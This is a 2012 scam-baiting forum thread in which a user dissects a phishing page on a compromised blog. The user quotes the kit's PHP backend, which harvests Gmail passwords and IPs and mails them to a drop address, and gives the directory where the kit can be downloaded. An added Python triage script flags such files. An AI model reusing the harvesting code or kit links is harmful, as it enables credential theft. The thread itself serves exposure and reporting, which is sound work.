zzz, Master Baiter (Joined: 14 Jun 2012; Posts: 100; Location: England)
Posted: Wed Jun 27, 2012 9:29 am
If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:
Quote:
To access our online secured auction page,
you are required to choose your email address below
Here is the link:
http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm
It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.
This is 100% fake and the purpose is to collect email/password information from innocent victims.
I made a quick analysis and was able to download a ZIP file containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here are the contents of one of the PHP files:
Quote:
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "mrsjanesmith0909@gmail.com";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>
I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:
mrsjanesmith0909@gmail.com
If anybody else wants to take a look, open the following link (it is safe):
http://www.jasonsamuel.com/fitness/properties/
It will open the directory contents; download the properties.zip file. The code listed above I extracted from gmail.php - the other PHP files in fact perform exactly the same thing - sending the victim's email and password to this same email address:
mrsjanesmith0909@gmail.com
What should be the course of action?
_________________
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood."
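Added example, not part of the original post or of the kit: a Python triage pass over PHP files unpacked from an archive like the properties.zip described above. It flags files that both read a password-like POST field and call mail(), then groups them by hard-coded address. The file contents, the file names other than gmail.php, and the addresses are constructed placeholders, and the regex heuristics are assumptions based on the quoted gmail.php.

```python
import re
from collections import defaultdict

# Heuristics taken from the pattern in the quoted gmail.php: a password-like
# POST field, a mail() call, and a hard-coded recipient address (assumptions).
POST_CRED = re.compile(r"""\$_POST\[\s*['"]([^'"]*pass[^'"]*)['"]\s*\]""", re.I)
MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed, abbreviated stand-ins for files unpacked from a kit archive.
# File names and addresses are placeholders, not values from the thread.
SAMPLE_KIT = {
    "gmail.php": r'''<?php
$message .= "Password: ".$_POST['gmailpassword']."\n";
$recipient = "drop@example.invalid";
mail($recipient,$subject,$message,$headers);
?>''',
    "yahoo.php": r'''<?php
$message .= "Password: ".$_POST["yahoopassword"]."\n";
$recipient = "drop@example.invalid";
mail($recipient,$subject,$message,$headers);
?>''',
    "contact.php": r'''<?php
// ordinary contact form: mail() but no password field
mail("webmaster@example.invalid", "Feedback", $_POST['comment']);
?>''',
}

def triage_file(source):
    """Return password field names and addresses if the file both reads a
    password-like POST field and calls mail(); otherwise None."""
    fields = POST_CRED.findall(source)
    if not fields or not MAIL_CALL.search(source):
        return None
    return {"fields": sorted(set(fields)),
            "addresses": sorted(set(EMAIL.findall(source)))}

def triage_kit(files):
    """Map each hard-coded address to the flagged files that reference it."""
    drops = defaultdict(list)
    for name, source in sorted(files.items()):
        hit = triage_file(source)
        if hit:
            for addr in hit["addresses"]:
                drops[addr].append(name)
    return dict(drops)

if __name__ == "__main__":
    for addr, names in triage_kit(SAMPLE_KIT).items():
        print(f"{addr}: {', '.join(names)}")
```

An address shared by every flagged file, as the post reports for this kit, is the value to include in a report to the mail provider that hosts it.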
B8er, boomdazzler (Joined: 16 Feb 2009; Posts: 2279; Location: Praying at the Church of Adobe)
Posted: Wed Jun 27, 2012 10:57 am
It's a phishing site, which we don't deal with here.
The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.
They will soon get it closed down.
_________________
As regard the blanck paper, I wanted to put in the word, but I didn't remember to write the words before we took the pictures. - Pastor Evans
Which one is your name Gender: Male or Mike Hunt - Samson Johnson
Larry Uzo - Abia state Nigeria>Cotonou>Natitingou>Cotonou>Abia State
Fake cheques: $4,031,969.31 USD
zzz, Master Baiter (Joined: 14 Jun 2012; Posts: 100; Location: England)
Posted: Wed Jun 27, 2012 11:07 am
^^^ Reported to Google.
Can a mod close this thread please?
woody999, Dormain Reshuffler (Joined: 30 May 2009; Posts: 10322; Location: East of Humptulips)
Posted: Wed Jun 27, 2012 1:02 pm
Marking as n/a and can be moved offline
_________________
"Why do you tell lies that are not useful" Phillip Okeke
"I lost my assories" Barr. Angus Bu...g
"YOU NEED SOME DOCTOR" Barrister Peter Paul
I dont know who is lieing ,either you or F3lcha1r -